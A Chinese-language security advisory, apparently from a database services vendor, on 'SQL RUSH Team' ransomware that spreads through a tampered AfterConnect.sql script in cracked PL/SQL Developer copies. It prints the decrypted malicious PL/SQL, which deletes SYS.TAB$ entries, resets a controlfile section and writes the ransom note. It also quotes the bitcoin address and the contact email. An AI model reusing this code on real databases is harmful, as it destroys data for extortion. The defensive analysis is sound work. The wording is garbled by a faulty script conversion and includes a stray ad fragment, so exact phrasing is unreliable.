最近,許多用戶遭碰著數據庫的安詳問題,我們在此提示所有Oracle數據庫用戶存眷此問題。
問題癥狀:
登錄數據庫時,提示數據庫被鎖死,黑客提示發送5個比特幣可以解鎖。
在數據庫的日志中,大概得到的信息如下:
ORA-00604: error occurred at recursive SQL level 1
ORA-20315: 你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地點 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (巨細寫一致) 之后把你的Oracle SID郵寄地點 sqlrush@mail.com 我們將讓你知道如何解鎖你的數據庫
Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.
ORA-06512: at “XXX.DBMS_CORE_INTERNAL ", line 27
ORA-06512: at line 2
問題原因:
按照我們收集的信息闡明,這個問題的原因是:
假如用戶從某些不明來歷下載了PL/SQL Developer東西后(尤其是各類綠色版、破解版),這個東西的安裝目次存在一個劇本文件AfterConnect.sql,正常安裝這個劇本是空文件,可是被注入的文件,該劇本包括了一系列的JOB界說、存儲進程和觸發器界說。
受傳染的AfterConnect.sql劇本開頭偽裝很是正常的代碼:
實質內容卻是加密的惡意代碼:
劇本代碼的焦點部門解密后如下:
BEGIN
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=1200) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
FOR I IN 1..2046 LOOP
DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
DBMS_SYSTEM.KSDWRT(2, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地點 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (巨細寫一致) 之后把你的Oracle SID郵寄地點 sqlrush@mail.com 我們將讓你知道如何解鎖你的數據庫 ');
END LOOP;
END IF;
END;
一旦利用這個東西會見數據庫,相應工具會被靠山自動注入數據庫,執行觸發器阻止后續的用戶登錄,并通過任務Truncate數據庫表。
我們強烈發起用戶查抄數據庫東西的利用環境,制止利用泉源不明的東西產物。
我們強烈發起:回收正版軟件,規避未知風險。
安詳裂痕:
險些絕大大都客戶端東西,在會見數據庫時,馬來西亞主機 日本服務器,都可以通過劇本舉辦必然的成果界說,而這些劇本往往就是安詳問題的裂痕之一,泉源不明的東西是數據庫打點大忌,以下列出了常見客戶端東西的劇本位置,需要引起留意:
SQL*Plus: glogin.sql / login.sql
TOAD : toad.ini
PLSQLdeveloper: login.sql / afterconnect.sql
處剃頭起:
假如您的數據庫已經蒙受進攻和數據損失,可以緊張接洽云和恩墨的處事團隊,我們可以輔佐您處理懲罰數據修復事宜。云和恩墨的ODU產物,可以在數據丟失后最大限度的規復數據。
事件回首:
2015年9月,XcodeGhost入侵蘋果iOS事件在業內引起不小震動。事件起因為不知名黑客向iOS應用開拓東西Xcode植入惡意措施,通過網盤和論壇上流傳,被傳染的App并以此挾制蘋果用戶相關信息。來自多個安詳團隊數據顯示,病毒傳染波及AppStore下載量最高的5000個App個中的76個,守舊預計受影響用戶數高出一億。
2012年2月,中文版putty等SSH長途打點東西被曝出存在后門,該后門會自動竊取打點員所輸入的SSH用戶名與口令,并將其發送至指定處事器上。